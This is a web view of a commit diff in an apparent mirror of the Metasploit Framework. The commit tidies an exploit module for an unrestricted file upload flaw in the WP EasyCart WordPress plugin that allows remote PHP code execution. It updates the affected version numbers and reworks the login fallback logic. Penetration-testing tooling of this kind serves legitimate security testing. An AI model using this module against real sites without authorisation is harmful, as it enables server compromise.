infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Correct version numbers and code tidy up

bug/bundler_fix
rastating 2015-01-19 20:59:46 +00:00
parent 8a89b3be28
commit 9d3397901b
1 changed files with 10 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
View File

@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress WP EasyCart 3.0.4 Unrestricted File Upload',
'Name' => 'WordPress WP EasyCart Unrestricted File Upload',
'Description' => %q{WordPress Shopping Cart (WP EasyCart) Plugin for
WordPress contains a flaw that allows a remote
attacker to execute arbitrary PHP code. This
@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DisclosureDate' => 'Jan 08 2015',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['wp-easycart < 3.0.16', {}]],
'Targets' => [['wp-easycart < 3.0.17', {}]],
'DefaultTarget' => 0
))
@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
check_plugin_version_from_readme('wp-easycart', '3.0.16')
check_plugin_version_from_readme('wp-easycart', '3.0.17')
end
def generate_mime_message(payload, date_hash, name, include_req_id)
@ -126,13 +126,15 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Authenticating using #{username}:#{password}...")
cookie = wordpress_login(username, password)
if use_ec_authentication
print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...") if cookie.nil?
if !cookie
if use_ec_authentication
print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...")
else
fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress')
end
else
fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
print_good("#{peer} - Authenticated with WordPress")
end
print_good("#{peer} - Authenticated with WordPress") unless cookie.nil?
end
print_status("#{peer} - Preparing payload...")